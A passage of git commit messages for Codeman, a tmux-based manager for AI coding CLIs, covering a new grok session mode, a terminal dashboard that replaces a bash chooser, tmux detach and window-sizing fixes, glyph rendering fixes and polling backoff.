The agent skill's endpoints.md is what other agents read as ground truth, and
three of its facts went stale when grok landed:
- `/api/v1/grok/status` was added to the probe list, but the sentence after it
still said only Pi's response carries `.data.version`. Grok's carries it for
the same reason (a squatted binary name), and an agent that trusts the old
wording has no way to tell a misresolved grok from an absent one.
- the `active-tools` bullet listed grok among the modes it stays empty for, then
claimed in the same breath that `isExternalCliMode` "lists only those five".
- its three source line refs had all drifted: `isExternalCliMode` is now
session.ts:174-183 (it was already wrong before this branch), the external-CLI
early return is session.ts:2261, and TEXT_COMMAND_PATTERN is
bash-tool-parser.ts:89.
CLAUDE.md and architecture-invariants.md counted modes in their Docker-cases and
Web-tabs paragraphs ("any of the five CLI backends", "never a sixth
SessionMode"). Both numbers were already stale before grok (antigravity and pi
had made it seven) and grok is now in the agent image, so the counts are gone
rather than incremented: the invariant those sentences carry is that Docker and
web tabs are not modes at all, which no number has ever helped state. The two
plan docs keep their original wording, being historical design records.
test/workflow-run-watcher.test.ts pinned its fixture's newest activity at
2026-06-14T20:06:40Z and then asked getRecentRunSummaries(100000) to return
it. That argument is MINUTES, so the window is 69.4 days: the assertion
expired at 2026-08-23T06:46:40Z and the file has failed on every branch
since, on a suite nobody had touched. The last green CI run finished at
06:47:43Z, about a minute inside the boundary, which is why it landed as a
surprise rather than a bisectable regression.
The fixture epochs now hang off a RUN_ANCHOR of Date.now() - 601s with every
offset preserved verbatim, so the parsed durations, the ordering and the
live-vs-done discriminators are all unchanged, and the recency filter is
still the thing under test. It just cannot rot again.
SessionMode gains 'grok', a first-class backend alongside Claude Code,
shell, OpenCode, Codex, Gemini, Antigravity and Pi: its own PTY, tmux
session, charcoal tab identity ('gk' badge), welcome button, run-mode
entry, cron agentType, Docker and remote-SSH command defaults, and
clone-repo Brain option. Flag surface verified live against grok 1.0.5.
Grok mixes two existing shapes and the wiring follows from that:
- Codex-shaped on permissions: the bypass switch is GrokConfig.alwaysApprove
(--always-approve, grok's bypassPermissions mode; config-level deny rules
still apply on top). The Run button sends it true, like runAntigravity(),
and clampExternalCliBypassForOwner() puts grok in the only-if-sent branch:
a bare grok spawn is grok's own ask-mode default, which is already safe,
so only a sent config needs the flag forced off. Cron needs nothing for
the same reason.
- OpenCode-shaped on rendering: grok is a fullscreen alternate-screen TUI
with mouse support, so it stays OUT of isAltScreenStripMode() and lands
on the narrow tmux-attach strip and the 'buffer' local-echo fallthrough
(unmeasured against an authenticated composer; documented fallback is the
'off' branch).
- Pi-shaped on resolution: 'grok' has npm squatters (@vibe-kit/grok-cli
also installs a grok bin), so grok-cli-resolver.ts version-probes every
candidate (grok --version, killSignal SIGKILL, VITEST-gated) and
GET /api/grok/status surfaces path AND version; GROK_VERSION_REGEX is
shared with the dependency registry so doctor and run mode cannot drift.
Env allowlist gains GROK_* plus the XAI_* vendor namespace (XAI_API_KEY is
grok's documented headless auth var), the same narrow-vendor reasoning as
GOOGLE_* for gemini. Resume is id-regexed on purpose: grok's own --resume
also matches session titles, which are arbitrary user strings that must
never reach the bash -c spawn line.
Docker: grok is not on npm, so the agent image installs it in its own step
(xAI's installer has no --dir override; the binary is copied to
/usr/local/bin and root's ~/.grok dropped in the same layer), and
credentials are seeded per-file (auth.json, config.toml, pager.toml; the
dir also holds sessions/, memory/ and the ~160MB binary). Remote SSH routes
through the login-shell wrapper like the other agent CLIs.
Verified end to end on an isolated CODEMAN_INSTANCE with grok 1.0.5
installed: /api/grok/status resolves and reports the probed version,
quick-start spawns a pane whose command line ends in 'grok
--always-approve', the real TUI renders (OAuth device screen on an
unauthenticated box), and grokConfig round-trips through state.json.
Docs: docs/grok-integration.md (user guide) + docs/grok-integration-plan.md
(decisions, verification record, follow-ups).
Tests: test/grok-mode.test.ts, test/grok-cli-resolver.test.ts, plus
extended clamp/system-routes/render-index-html/run-mode-ui/mobile-overview/
local-echo-gating coverage. npm test (the CI gate) green: 5910 tests.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
scripts/tmux-chooser.sh is deleted. codeman tui replaces it and does the
job better: sc numbered its entries globally but only accepted a single
[1-9] keypress, so sessions 10+ were listed and unselectable, and it
inferred nothing about what an agent was doing. The tui carries the
server's real states, answers permission dialogs, and leaves an attach
with one key.
install.sh no longer creates the tmux-chooser symlink or the sc alias.
It now sweeps both up instead, on update AND uninstall, so an update
cannot leave a symlink pointing at a script this version stopped
shipping. The alias removal is marker-owned: it matches the exact line
the installer wrote, so someone's own 'alias sc=' for another tool is
never touched, and it rewrites through 'cat >' so the profile keeps its
mode and ownership. Verified against three profile shapes.
BREAKING CHANGE: the 'sc' command and the 'tmux-chooser' symlink are
gone. Use 'codeman tui' (and 'codeman tui --list' / 'codeman tui <n>').
codeman tui supersedes the sc bash chooser: it reaches sessions 10+,
carries the server's real states instead of a static list, and leaves an
attach with one key. Every place that told a user to run sc now names the
tui equivalent, including the two wiki pages and install.sh's next-steps
banner. Both wiki pages also carried the wrong detach chord (Ctrl+A D;
the socket's prefix is C-b), which the tui makes moot.
Source comments that explained themselves as "the sc -l replacement" now
just say what they do. docs/tui-plan.md and CHANGELOG.md are historical
records and keep their references.
CLAUDE.md gained "any new `tmux -L` caller through `resolveTmuxSocketName()`"
but architecture-invariants.md, which that bullet points at for the
mechanism, still described only the dataPath() half. Say why the rule
exists there too: the TUI is the first non-server process to shell out
to tmux.
The sc chooser runs a plain `tmux attach-session` and binds nothing, so
F1 does not detach from it; only `codeman tui`'s attach claims that key,
and only for its own duration. The line it replaced was wrong too (the
socket's prefix is C-b, not C-a), so name the real chord and say which
command gives you the single key instead.
The guide and the README both said to detach with `Ctrl+B D`. Beta testing
proved that wrong twice over: tmux binds lowercase `d` to `detach-client` and
capital `D` to `choose-client`, and even the correct letter fails for anyone who
keeps Ctrl held, because that sends `Ctrl+D`, which tmux leaves unbound. A
tester followed the documented instruction, stayed attached, and exited the
agent to escape.
Both now say `F1`, and the attach section describes what actually happens: the
session strip across the top of the pane, `Alt+1`..`Alt+9` switching without
returning to the dashboard, and `r` to resume a session whose pane has died.
Also corrected: `1-9` switches rather than jump-attaches, `x` confirms with `y`
rather than a typed name, and a new session opens straight into its pane.
`docs/tui-plan.md` is deliberately untouched — it is the design record of what
was planned, not a description of what shipped.
The loose end from 777f974, now explained. Sessions came back from a detach on
`window-size latest` instead of `manual`, and the restore primitive round-tripped
correctly in isolation, so the corruption had to be upstream of it. It was: the
snapshot was taken from state this code had already broken.
`bindSwitchKey` passed a bare `;` between the two commands it wanted in one
binding. That is a command separator to tmux's OWN parser, not an argument: it
ended the `bind-key` and executed what followed immediately. So the binding kept
only `switch-client`, and `set-window-option ... window-size latest` RAN against
every switchable session at attach time — before the sizing snapshot was taken.
Every session was therefore snapshotted as `latest` and faithfully restored to
`latest`.
Proven against real tmux both ways before fixing: a bare `;` leaves the session
on `latest` and stores a one-command binding, while `\;` leaves it `manual` and
stores both commands.
Verified end to end: 7 sessions manual before, 1 latest + 6 manual during the
attach (the attached one follows the terminal, the rest are pre-sized), no dot
padding on a switch, and all 7 back to 120x40 manual after the detach.
This also means the "follow the terminal after switching" half of 777f974 never
actually worked — it was never in the binding.
The overview showed the same session twice, one frame above another, after
switching sessions (reported from the beta with a screenshot).
Claude repaints by ABSOLUTE CURSOR POSITIONING, not by clearing: a 198KB pane
tail carries 1142 `CSI r;c H` and exactly one `CSI 2J`. The replay honoured the
COLUMN of those sequences and ignored the ROW, so a repaint could never
overwrite what came before and was appended instead. That same tail replayed as
FIFTY stacked copies of one frame. The preview shows the last N lines, so on a
short terminal you saw the newest frame by luck and on a tall one you saw the
end of the previous frame above it.
A cursor HOME now starts the buffer over. That is not a heuristic but the
line-based equivalent of what a home means: a full-screen app announcing it is
repainting from the top, with everything on screen about to be overwritten in
place. Only row 1 column 1 counts — any other address is a write position
inside the frame being painted, and resetting on those would erase live
content.
Measured on the real tail that produced the screenshot: 198599 bytes and 50
copies of the welcome frame collapse to 40 lines carrying exactly one.
The old test pinned the append behaviour, including a spurious leading empty
line that the initial CUP produced; both are gone.
The bar now reads "alt+1-9 switch · F1 back to the codeman dashboard", so the
switch keys are discoverable instead of secret. Shown only when those keys were
actually claimed, the same rule the way-out key follows: a bar naming a key
that does nothing is the bug this series started with.
THE DOT GRID. Switching landed in a pane occupying part of the terminal with
tmux's dot fill everywhere else. It was never a size mismatch — the window was
already the right size. `window-size latest` only resizes a window while a
client is ON it, and the sessions behind the tab strip have none until you
switch, so the resize happened AT the switch: tmux painted the newly-available
area with dots and an idle claude had no reason to redraw into it. Every
switchable session is now pre-sized to the attaching terminal, which moves that
repaint to attach time while the user is still looking at the first session,
and the switch binding restores `window-size latest` on arrival so a mid-attach
terminal resize still follows. Measured: 14 consecutive switches across 7
sessions, zero dot-padded rows, against 1-in-6 before.
⚠️ Known loose end, deliberately not papered over: after a detach the window
SIZE is restored exactly but the window-size MODE can come back as `latest`
rather than `manual`. The restore primitive round-trips correctly in isolation
(manual -> presize -> latest -> restore = manual) and no call site in the TUI
or the server sets `latest` afterwards, so the cause is not yet identified. The
practical effect is nil: the remaining client keeps the window at its own size
and Codeman re-pins `manual` on the browser's next resize.
Switching with Alt+N landed in a pane that filled part of the terminal with
tmux padding the rest as a dot grid — reported from the beta with a screenshot
showing the pane in the left half and dots everywhere else.
Codeman pins every window `window-size manual` at the BROWSER's size
(tmux-manager.ts), so no attaching client can resize it. The attach already
lifted that for the session it opened, which is why a plain attach looked
right; `switch-client` then moved the user into a session that had never been
lifted, and the old pin reasserted itself. `window-size latest` now goes on
every session the strip can reach, alongside the bar those sessions already
get, and each one's original sizing is snapshotted and restored on detach.
Verified by round-tripping a session pinned at 120x40 manual: latest 190x49
while attached, back to 120x40 manual after, with no dot rows at either step
and the bar intact at full width after a switch.
The renderer's own FOOTER_KEYS table still said 'jump'. It is only reached when
the app layer supplies no footerKeys, so nothing visible was wrong, but a
fallback that contradicts the live footer is exactly the kind of drift that
turns into a bug report later.
Four faults, all reported at once, and three of them were mine from the last
two commits.
THE HINT VANISHED. Two independent causes. First, a leaked F1 binding: an
attach whose TUI was killed leaves `F1 -> detach-client` in tmux's root table,
and the claim treated "already bound" as someone else's key, so every later
attach fell back to advertising the tmux chord — the bar stopped saying F1
while F1 still worked. A key already bound to `detach-client` now counts as
ours. Second, width: tmux truncates a status line that overflows and drops the
RIGHT-aligned segment, which is the hint. The strip now gets a budget measured
from the terminal's width minus the hint, and it drops tabs from the far end
until it fits. ⚠️ Measured on VISIBLE columns, not format bytes: `#[reverse]`
costs zero columns, and counting it made a strip that "fitted" still truncate
the hint at 80, 100, 120 and 176 columns on a real terminal.
ALT+N DID NOT SWITCH. On the dashboard, a bare digit meant jump AND ATTACH, and
a terminal sends Alt+N as ESC then N: when those land in separate reads —
routine over SSH — the chord decodes as Escape plus a bare digit, so "switch to
tab 2" threw the user into tab 2's pane. A digit now SELECTS, matching what
Alt+N means in the web UI; Enter is how you go in. Inside a pane the keys never
reached the TUI at all, since tmux owns the terminal, so the attach now binds
Alt+1..9 in tmux's root table to `switch-client` — the strip is usable rather
than decorative. ⚠️ The bar is applied to every session the strip can reach,
each highlighting its own tab: with it on the attached session only, switching
landed the user in a pane with no strip and no way out on screen.
⚠️ The leaked-state sweep was missing `status-position`, so it removed the
marker and left the position behind — and with no marker the leftover no longer
matched, making it permanently unsweepable. Found by diffing every session's
options after a detach.
Attaching made every other session disappear: the dashboard is gone, tmux owns
the terminal, and there is nothing left saying what else is running. The attach
bar now carries the session strip, numbered exactly as the dashboard numbers
them, with the session you are in inverted, and it sits at the TOP of the pane
where the web UI keeps its tabs.
The strip is a WINDOW around the active tab, not the whole list, with ellipses
marking each end that is actually cut. The bar is one line shared with the way
out, and that hint is the only instruction a user gets while tmux has the
terminal, so it must never be crowded off; a test drives 20 long-named sessions
through the bar and asserts it survives.
⚠️ The strip is a snapshot taken at attach time and never refreshed. The TUI is
blocked in `spawnSync` for the whole attach so there is no loop to update from,
and tmux's own format language cannot map a `codeman-<hex>` session name back
to a label a human recognises. Slightly stale beats absent.
The way out moves from F12 to F1, which sits beside Esc where a hand backing
out already goes. Verified against BOTH encodings a terminal sends for it:
xterm's SS3 (ESC O P) and PuTTY's default (ESC [ 1 1 ~).
`status-position` joins the snapshot, so a session that had its bar at the
bottom gets it back there on detach along with everything else.
Three separate "why are there boxes" reports, and I fixed them one glyph at a
time instead of as a class, so the next one was always waiting. Grouping the
tester's terminal by unicode block made the rule obvious:
RENDERS Latin-1 (·), Box Drawing (─ │), Block Elements (█ ▛ ▐),
Geometric Shapes (○ ▶), General Punctuation (…), Arrows
TOFU Miscellaneous Technical (⏎ U+23CE, ⏵ U+23F5), the sparse end
of Dingbats (❯ U+276F)
That is an ordinary font, not a broken one, so it is the profile to design
against. The working spinner moves off Dingbats and Math Operators onto
quadrant blocks (▖▘▝▗) — the same block as the `▛█▐` art claude itself draws,
which that font renders fine — and the blocked marker moves off `⚠`
(Misc Symbols, emoji presentation on many terminals) onto `▲`, the block that
already gives us `▶` and `○`.
The preview fold gains claude's own spinner dingbats (✢ ✳ ∗ ✻ ✽ ✴ → `*`) and
`⚠` → `!`. Its animated status line is exactly where a reader looks, so tofu
there is the most visible kind there is.
A test now enforces this as a CLASS: no glyph in the unicode set may come from
Misc Technical, Misc Symbols or Dingbats, with U+2714 the single documented
exception because it was observed rendering on the very font that failed the
others. Verified by scanning a live frame driven with the tester's exact
environment: zero glyphs from any of the three blocks.
Killing demanded the session's NAME typed out in full. That is the right
ceremony for dropping a production database and the wrong one for closing a
pane you are looking at; the beta tester's verdict was "thats stupid, just make
me type Y to confirm". `x` then `y` is already two deliberate keystrokes on a
row the user selected, and the conversation lives in its transcript, which a
kill does not touch.
Everything that is not `y` CANCELS rather than being ignored, so a stray key
closes the dialog instead of leaving a destructive prompt armed and waiting for
whatever gets typed next. Enter cancels too: it is the key most likely to be
hit by reflex, and this is the one dialog that destroys something.
⚠️ Found while verifying the new dialog: it did not name the session. The label
was computed as `row.session.name ?? id.slice(0, 8)`, and `??` falls back only
on null or undefined, so every session the server left with an EMPTY name — all
of them, until the TUI started naming its own — sailed through and the box read
"Kill ?". A destructive prompt that cannot say what it will destroy is worse
than no prompt, and it is now a single keystroke. The caller passes the same
label the LIST shows, so the dialog names the row in front of the user.
The typed-name machinery goes with it: TuiConfirmState.typed, setConfirmInput(),
confirmAccepts() and the 'typing'/'reject' steps are all removed rather than
left as unreachable branches.
Two reports from the same beta screenshot.
Starting a session left the user on the dashboard next to the row they had just
asked for, which reads as the create having silently failed. Starting a session
is a request to WORK in it, so the terminal now goes there as soon as the pane
exists, and the CLI booting is worth watching. If the pane is slow the notice
says so and the row is left selected, exactly as the resume path does.
The footer's `↵` was drawing as an empty box: `⏎` (U+23CE) has poor font
coverage, on the same terminal that renders `·`, `─`, `│`, `○`, `▶` and `✔`
perfectly. It is now U+21B5, from the Arrows block every monospace font ships.
`✋` (U+270B) was worse than a coverage problem: it is East Asian WIDE, so the
renderer, which addresses cells by column, was reserving two cells for it. The
golden frames had the age column shifted a space left to match, which is how
long that had been wrong. It is now `!`, and the frames align correctly.
A test walks the whole unicode glyph set and fails on any entry wider than one
cell, so a glyph that shifts the layout cannot be added again. The comment on
the table spells out both bars a glyph has to clear, because the tier check
answers neither: it asks whether the LOCALE is UTF-8, which says nothing about
whether a font has the glyph or how wide it draws.
Alt+1..9 switches to that session, and `[` / `]` / Tab step through them, so the
muscle memory from the web UI carries over.
Alt+N SELECTS rather than attaches, which is what the web UI's Alt+N does:
switching which tab you look at is cheap and reversible, and the terminal
equivalent is moving the selection and its preview, not handing the whole
terminal to a pane. Bare 1-9 keeps its documented jump-and-attach meaning.
Two of the web UI's chords cannot cross into a terminal, so the nearest
transmittable keys carry them instead:
Alt+[ / Alt+] ESC+[ IS the CSI introducer every arrow key arrives on, and
ESC+] is OSC, so neither chord is distinguishable from a
sequence. Bare `[` and `]` do the job.
Ctrl+Tab a terminal cannot report the Ctrl, so plain Tab carries it.
⚠️ The parser now decodes ESC + a printable character in ONE read as an Alt
chord, and the app replays every chord it does not claim as `escape` then that
character. That fallback is load-bearing, not tidiness: a real Esc landing in
the same read as the next keystroke is byte-identical to a chord, and without
the replay "Esc then q" typed quickly decoded as Alt+Q, matched nothing and was
swallowed. The e2e suite caught exactly that as the dashboard refusing to quit.
A lone Esc is still held and flushed on the caller's timer, which is what keeps
the two separable at all.
A beta tester photographed claude's `❯` prompt and its `⏵⏵` bypass-permissions
marker rendering as empty boxes in the preview pane. Their font has no coverage
for those codepoints while drawing `·`, `─`, `│` and `▶` perfectly.
The glyph TIER cannot help here. It answers "can this terminal do Unicode at
all", which is a locale question, and it correctly says yes for exactly the
terminals this affects. Coverage is per-glyph and undetectable from inside the
process, so the handful of rare glyphs CLIs use as chrome are folded to the
ASCII arrows they already look like, and everything a plain font does render is
left alone.
Scoped tightly: the preview only, never the TUI's own chrome, and skipped
entirely at the `nerd` tier where the user has declared a font that can draw
anything. The table is short and every entry was seen as tofu in a real
terminal rather than guessed at. The fold is length-preserving, so the preview
pane's column arithmetic is unaffected.
Refusing the attach stopped the freeze but told the user to throw the session
away (`x` to close, `n` for new), which loses the conversation. tmux's own
dead-pane screen already says what to do instead: `claude --resume "<name>"`.
The Error card now offers `r` when the row can actually be resumed (claude,
with a conversation id and a working directory), and the footer says so. One
press resumes into a fresh pane and attaches to it, so a dead end becomes
recovery.
⚠️ Three things keep this from becoming the resume runaway that once spawned 35
sessions in 40 seconds. The offer holds a session ID, not a row, and is
re-resolved from the model when the key is pressed: a row captured when the
card opened is stale by then. It disarms BEFORE anything async, so a second `r`
cannot start a second resume. And it routes through resumeSelected(), which
owns the `resuming` flag and ends in attachToSession() rather than the group
dispatch.
⚠️ The `r` branch has to run BEFORE the generic dismiss, because a message
overlay is dismissed by ANY key: without that ordering the offer is consumed as
"some key was pressed" and the card merely closes. `help` keeps the any-key
behaviour, so the two modes no longer share a case.
Verified end to end against a genuinely dead claude pane: card, footer, one
press, one new session, and F12 back to the dashboard.
Three beta rounds died on tmux's native way out, and the last one died on the
instruction rather than the mechanism: "press Ctrl+B, release Ctrl, then d" is,
in the tester's words, very unclear, and holding the modifier through both keys
silently does nothing.
So the way out stops being a chord. The attach claims F12 in tmux's prefix-less
`root` table for its own duration, and the bar reads "press F12 to get back to
the codeman dashboard" — one keystroke, nothing to hold, nothing to release,
no order to get right. F12 because stock tmux ships an empty root table apart
from mouse bindings, and none of the CLIs that run in these panes want the key.
⚠️ The bar names the one key ONLY when the claim succeeded, and falls back to
the chord wording otherwise. A bar advertising a key that does nothing is the
bug this whole series started with, and it must not come back in a new costume.
Same claim rules as the prefix alias: taken only when tmux reports the key
unbound, given back only while it still means `detach-client`.
The chord and the held-Ctrl alias both keep working; they are simply no longer
what the user is told to press.
Reported three times as "Ctrl+B and d is still not working", on a build whose
bar already named the right key. Measured against a live pane: of the three
ways a person types this, only one worked.
Ctrl+B, release Ctrl, then d detaches
Ctrl+B then Ctrl+D (held) nothing happens
Ctrl+B then Shift+D nothing happens
Holding Ctrl through both keys sends 0x02 then 0x04, and tmux ships `C-d`
unbound in the prefix table, so the keystroke is swallowed in silence and the
attach looks frozen. That is not a user error worth documenting around: holding
the modifier is how most people type a two-key chord.
The attach now claims the held-Ctrl form of whatever key detaches (`d` → `C-d`)
for its own duration and gives it back on restore, and the bar advertises it
only once the claim succeeded, so it can never name a key that does nothing.
⚠️ The key is claimed ONLY when tmux reports it unbound, and released only
while it still means `detach-client`, so a binding of the user's own is never
shadowed or removed. The alias is deliberately excluded from the leaked-state
sweep: key tables are server-global, so the sweep cannot tell a leak from a
second TUI's live claim, and a stray `C-d`→detach is harmless either way.
Ruled out along the way, with evidence rather than assumption: the encoding.
tmux negotiates no extended-key mode upstream on attach (no kitty CSI-u, no
modifyOtherKeys, no DECSET 2017), so Ctrl+B does arrive as a plain 0x02 even
from a Claude pane, which has its own keyboard protocol.
Two more from the same beta round, both reported as "basic things are broken".
Attaching to a DEAD pane trapped the user. Codeman sets `remain-on-exit on`, so
a session whose agent has exited does not disappear: the row looks ordinary,
the server still reports it idle, and Enter handed the terminal to a pane that
reads no input. With the detach chord also wrong at the time, that was a hard
freeze with no way out. Enter now probes `#{pane_dead}` first and refuses with
an Error card naming the session and what to do instead. The probe fails OPEN,
so it can never block an attach to a live pane. ⚠️ It also has to paint: the
keypress that reaches attachToSession() has already painted by the time an
awaited probe resolves, so message() alone left the refusal invisible and Enter
looked inert, which is the bug it was added to fix.
A session started from the TUI came out unnamed, because startSession() sent no
sessionName and rowLabel() then fell back to the transcript's first line. A
brand-new session has no prompt to be named after, so the list showed a
perfectly healthy session called "Login interrupted" — the CLI's startup
output, reading like a failure report. Sessions the TUI starts are now named
`w<n>-<case>` like the web UI's, and rowLabel() prefers the case directory over
a scraped prompt for any row with a mux name, since a LIVE pane is identified
by where it runs while a history row genuinely is its prompt.
restore() runs after spawnSync returns, which covers detaching and the agent
exiting inside the pane, but not the terminal dying while attached. Closing the
window or dropping the SSH kills the TUI where it stands, and the bar it
installed stays pinned on the session: the next attach wears a stale bar naming
a different session, and the pane is a row shorter for good. Seen on the beta,
where the tester closed the window instead of detaching.
One sweep at startup, fire-and-forget so it can neither delay the first frame
nor fail a start. Only a bar carrying our own marker is touched, and the marker
is now the single source of the bar's own wording so the two cannot drift; a
user's hand-written status bar on the same session is left exactly as it is.
The session goes back to `status off`, which is how Codeman creates every pane
it owns and the only state this bar is ever applied over.
Two things the attach status bar got wrong, both found in a beta test.
The bar read `Ctrl+B D`. tmux key tables are case-sensitive: lowercase `d` is
`detach-client`, capital `D` is `choose-client`. Pressing what the bar said
opened a client chooser and left the tester attached, with the way out on
screen and inert. The key is now READ from `list-keys -T prefix` the same way
the prefix already was, rather than hardcoded, so a rebound tmux is followed
too and the label cannot drift from the binding again. It never goes through
formatPrefixKey(), which uppercases.
The bar also rendered as a full-width bright green slab. Only `status-format[0]`
was styled, so tmux's stock `status-style` (`bg=green,fg=black`) stayed
underneath it and won; `#[reverse]` on top could not undo it. `status-style` is
now set explicitly to `bg=default,fg=default` and snapshotted/restored with the
rest, so the bar sits on the terminal's own background and reads as a hint
line.
Tests pin both: that the chord ends in lowercase `d` and never ` D`, that a
rebound key prints verbatim, that `status-style` is part of the banner, and
that parseDetachKey() picks `d` out of verbatim tmux 3.4 `list-keys` output
while ignoring `detach-client -a`/`-P`, which act on other clients.
Three things the first beta test surfaced.
1. Attaching from a terminal of a different shape showed the pane clipped to the
browser's size, with tmux's dot padding filling the rest. Codeman pins every
window it owns to `window-size manual` at whatever the web client reports
(tmux-manager.ts), so no attaching client can resize it. The handoff now
brackets the attach with `window-size latest` and restores the snapshot on
detach. `latest`, rather than a one-off resize to our own size, is also what
lets a terminal resized MID-attach follow along: tmux recomputes on every
SIGWINCH while the TUI is blocked in spawnSync and cannot.
2. Nothing on screen said how to get back out, because Codeman keeps the status
bar off on its panes (the web UI carries that information around the terminal
instead). The tester exited the agent looking for the exit, leaving a dead
pane. An attach now wears a `status-format[0]` bar reading "<prefix> D
detach, back to the codeman dashboard", with the prefix READ from tmux rather
than assumed, and the session's options are put back exactly as they were on
detach. One option, not status-left/status-right, so tmux draws no window
list beside it; `reverse` so it inherits the terminal's own theme. Restoring
an array option unsets the BASE name, since dropping the `[0]` index leaves
an empty array, which renders as a blank bar on a session that had one. The
help overlay names the chord, and the dashboard confirms the detach.
3. Enter on a RECENT row said resuming was not wired up. It now creates a
session carrying that conversation (`resumeSessionId` plus `/interactive`,
the path the web UI's Resume Conversation list already uses), in the
directory it ran in and under its old name, then attaches to it.
The attach mechanics deliberately sit in a method the group dispatch cannot
reach, plus a re-entrancy flag: routing resume back through the Enter handler
re-dispatched on "this row is RECENT" and spawned one session per pass, 35 in
about 40 seconds on the beta before it was killed. test/tui/tui-e2e.test.ts
pins one press to one session with a pane that never appears, which is
exactly the case that looped.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Both of the dashboard's periodic reads hit endpoints that are far more
expensive than their cadence assumed, and the cost lands on the SERVER's
event loop, so it is paid by every browser client too.
`GET /api/sessions/unified` is ~550ms against 11 live sessions: it scans
every Claude transcript plus the lifecycle log, uncached, and republishes
the search index. `scheduleRefresh()` was a 250ms trailing debounce with no
floor, and a queued refresh re-ran the instant the previous one returned
(by recursing, which also chained one pending promise per iteration), so a
stream of events paced the refetches at the endpoint's own latency: with
`session:updated` broadcast per session per 500ms while anything is
working, the scans ran back to back. `resyncDelayMs()` now keeps ambient
refetches 3s apart, measured start-to-start. The user's own actions call
`refresh()` directly and are unaffected, so what this paces is only
"notice what changed elsewhere".
`GET /api/sessions/:id/terminal` is ~80-100ms: two `execSync` tmux calls,
then the whole byte buffer normalized before the tail is taken. It was
polled every second for as long as a live row was selected. It now backs
off 1s, 2s, 4s, 5s while consecutive reads change nothing, and resets to 1s
on any change, when the selection moves, when this dashboard sends input or
answers a dialog, and on return from an attach. A pane that is printing is
still read every second; a pane at its composer is not.
The poll also kept running in three places it had nothing to draw for: the
whole time the user was attached in tmux (an attach can last hours), and
behind the message overlays that an async action opens (answered, killed,
started), which are not keystroke-driven and so never reached the
`afterInput()` path that stops it. `setInterval` becomes a chained
`setTimeout`, since the delay now varies.
Measured against the live server, same idle row selected, 25s window:
22 tail reads before, 5 after. With a working pane selected it stays at 22,
which is the intended cadence for a pane whose output you are watching.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
`TuiModelStore.confirmSatisfied()` and `approvalFor()` had no caller
outside their own tests. The first one mattered: it answered "does the
typed text authorize this kill?" with an exact name match, while the rule
actually consulted (`confirmAccepts()` in tui-app) also accepts the
8-character id prefix a mux name carries. Two divergent answers to one
question, the stricter one unreachable and waiting to be picked up by
mistake. knip cannot see class members, so the dead-code sweep never
flagged either.
The tests they existed for now assert observable state instead, and the
approvals one got stronger on the way: it checks that a session id coming
back does not inherit the dead session's dialog, which is the invariant
`removeSession()` is actually keeping.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
`TuiSessionRow` declared `lastSubmitAt`/`inputTokens`/`outputTokens`,
`stateSince()` ordered the WORKING group by the first of them and
`renderRowLines()` painted the other two, but nothing ever filled any of
them in: the unified list carries none, and the `session:updated` payload
that does was discarded (an event only schedules a refetch).
So a running turn was dated by its SESSION's creation instead. Measured
against the live server before the fix: w65 (created 21h ago, turn started
one minute earlier) outranked w67 (created 15 minutes ago, turn started
five minutes earlier), the reverse of the rule docs/tui.md states, and the
elapsed column read `21h` for a turn a minute old. The token column was
unreachable code for the same reason.
`fetchLiveSessionMetrics()` reads the three fields from `GET /api/sessions`
and `applyLiveMetrics()` folds them onto the rows. That route answers from
the server's cached LIGHT state (no terminal buffers): 10-20ms measured,
against the ~550ms the unified list in the same `Promise.all` already
costs, so it is cheap enough to ride every refresh. It is best-effort like
the approvals and tmux reads beside it, because losing the anchor is
better than losing the list.
A ZERO is treated as unknown rather than merged: `stateSince()` reads
`lastSubmitAt ?? createdAt` and 0 is not nullish, so a merged 0 would date
every never-submitted session to the epoch.
The snapshot path gets the same merge, or `codeman tui --list` would number
the WORKING group differently from the dashboard that `codeman tui <n>`
indexes into.
Verified live: working rows now show 28m/8m (turn age, tokens 280.5k/65.2k)
where they showed 21h/34m and no tokens. The e2e assertion fails on master's
wiring with `[*] 10m` against a session that pressed Enter one minute ago.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The data-dir half was already spelled out; the socket half only lived in
a function docstring, and the TUI is the first code that shells out to
`tmux -L` from a process that is not the server.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The inventory test predates the `tui` command, so a rename or an
accidental removal would have gone unnoticed: it now asserts the command,
its `-l`/`--list` flag and its optional position operand.
The digest and search-result lines joined their halves with an em-dash,
which the repo's own convention rules out, so both now use the middle dot
the surrounding lines already use. The one em-dash left in `src/tui/` is
load-bearing: `search-service.ts` builds a session snippet with it, and
the pattern that strips the repeated label has to match it.
Also moves `buildSearchEntries`'s doc comment back onto
`buildSearchEntries`; it had ended up stacked above a helper.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
`mark()` had no callers (knip's only finding on this branch), and the
renderer's fallback help list advertised `r` resume, which is deferred
with the rest of phase 3: a help screen naming a verb the build does not
implement is worse than no help.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The user guide covers what the dashboard is (and is not), the two
non-interactive fast paths, the four groups and their ordering, the full
keymap, what answering an approval does server-side, and the SSH/narrow
and degraded cases. The example frame is a real 100x30 capture against
the E2E fake server, not a drawing.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
A server that comes up mid-run was upgrading the header's hostname and
version but not its chip, which then stayed blank until the next telemetry
event. Also swaps a typographic apostrophe out of a preview error, which is
not renderable on the ASCII glyph tier.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Two small honesty fixes at the edges: a server that goes down leaves the
dashboard holding prompts nothing can classify any more and whose answer
route is unreachable, so degraded mode clears them; and a resize can cross
the narrow breakpoint, where there is no preview pane to poll for.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Measured against a live Claude pane: an Ink TUI paints by ROW and emits
almost no newlines, so dropping cursor-position sequences collapsed a whole
screen into one unreadable line, and a tail cut mid-sequence printed the
remains of it (";1H") as text. Now a jump to column 1 starts a display line,
a jump inside a row moves the write position (capped, since a stream may
address a column no terminal has), and a severed CSI head is dropped before
parsing.
The preview is readable against a real session as a result: tool calls, the
working line and the composer all land where they belong.
Also drop the repeated session name from a search row, whose snippet opens
with the name the row already shows in its first column.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The fake API server grows the routes the dashboard now calls (terminal tail,
